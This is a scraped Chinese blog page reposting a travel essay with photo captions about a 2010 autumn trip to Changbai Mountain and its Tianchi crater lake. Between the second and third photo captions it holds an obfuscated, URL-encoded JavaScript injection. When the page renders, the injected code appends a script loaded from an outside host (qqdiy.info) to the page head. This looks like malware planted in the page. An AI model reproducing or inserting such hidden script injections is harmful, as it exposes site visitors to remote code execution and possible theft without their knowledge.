注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

m13986235944的博客

木兰花欢迎您光临惠顾

 
 
 

日志

 
 

【转载】长白山峰  

2016-08-15 07:52:37|  分类: 东北三省 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本文转载自神秘之海《长白山峰》

神秘之海/文    摄影

          2010年秋,约好朋友一起沿着沈吉高速公路向长白山进发。一路上秋高气爽,绿树成荫,花香流溢,景色宜人,一片辽阔。400多公里路程,一气呵成,当晚宿营在长白山脚下的“蓝景花园酒店”。久居城市,钢筋水泥的重重包围,都市拥挤和烦喧,怎能想到投身到大自然放飞心情的快感呢。哇!这就是心灵净化、悠闲宁静、遐想无限的美丽长白山风情。

  长白山一望无际的原始森林,巨大无比的高山湖泊,气势磅礴的长白瀑布,鬼斧神工的大峡谷,星罗棋布的温泉群,丰富多彩的自然景观带,奇异的火山地貌,珍贵的动植物,俨然就是一座天然的自然博物馆。合着哗哗溪流的欢快节律,轻快步移,景殊物异。灌木浓绿,古树苍苍,鸟鸣谷幽,富含负氧离子的新鲜空气带着凉意直沁心脾。

  我们顺着小路在林中穿行,一边拍摄这光与影的合奏,一边留心聆听鸟兽的动静,只见那茫茫林海,浪涛旋转,好不辽阔!(据说林中时有黑熊和大角鹿之类动物出没,对游人有威胁。)远方,灰蒙蒙的林海与蓝天交融在一起,近处,绿波推涌,扑面而来。那神奇的大森林让我眼花缭乱,心旷神怡。极目四望,那巍峨雄伟的山峰,那苍翠浓郁的林海,那满山盛开的鲜花,那热气升腾的温泉,那白练当空的瀑布,组成了光彩夺目的梦幻之景,我的心醉了,深深地醉了……

  更美的是长白山天池,天池被十六座山峰环抱在怀中,圆形的湖面像镶嵌其中的一块碧玉,在阳光下显露出玻璃般的玉光。白云峰是长白山的最高峰,攀上峰顶可以一览天池全貌。在刚刚下过的一场薄薄白雪的映衬下,组成了黄、绿、白三种颜色,分外妖娆。从瀑布流下来的池水,冰冷彻骨,凉气袭人;从温泉群涌出的泉水,蒸气弥漫,热气升腾。只见那铺满苔原的牛皮杜鹃,以白雪衬底,长着绿叶,开着粉红色的鲜花,还有那一片片长白山特有的“雪中花”。忽然,头顶上响起一阵急促热闹的尖叫,仰面望去,一群群身漆黑,尾溜尖的燕子钻天入云,上下翻飞,这就是长白山有名的“针尾雨燕”。我双目贪婪着游离在群峰万物之间,唯恐掠过奇特光景。长白山“千年积雪万年松,直上人间第一峰”。

……

  在返程的路上,我沉默不语,在想:人,不同的时间,不同的心情,也会看到不同的风景。好像人生,走过的人生道路都将成为背后的风景,不能回头不能停留。当欣赏群山,就要放弃平原;要欣赏大海,就得放弃小溪一样。要懂得珍惜自己现在拥有的,那是,因为曾经努力奋斗过,曾经收获了,也曾经拥有过……

长白山峰 - 神秘之海 - 【神 秘 之 海】

     (图一)神秘微笑

长白山峰 - 神秘之海 - 【神 秘 之 海】

     (图二) 苍茫天池

长白山峰 - 神秘之海 - 【神 秘 之 海】

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<

     (图三) 层林尽染

长白山峰 - 神秘之海 - 【神 秘 之 海】

      (图四) 琼玉凌空

长白山峰 - 神秘之海 - 【神 秘 之 海】

      (图五)烟波浩淼

长白山峰 - 神秘之海 - 【神 秘 之 海】

      (图六)荡漾逸韵

长白山峰 - 神秘之海 - 【神 秘 之 海】

      (图七)窃窃私语 

长白山峰 - 神秘之海 - 【神 秘 之 海】

            (图八)七彩迷离

              编后:为了连续发表《故乡沈阳》,所以2010年其它图文景致,游记抒怀,将陆续与博友见面和交流,衷心期待朋友指教。

长白山峰 - 神秘之海 - 【神 秘 之 海】

 2011—03—01

 

  评论这张
 
阅读(67)| 评论(92)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017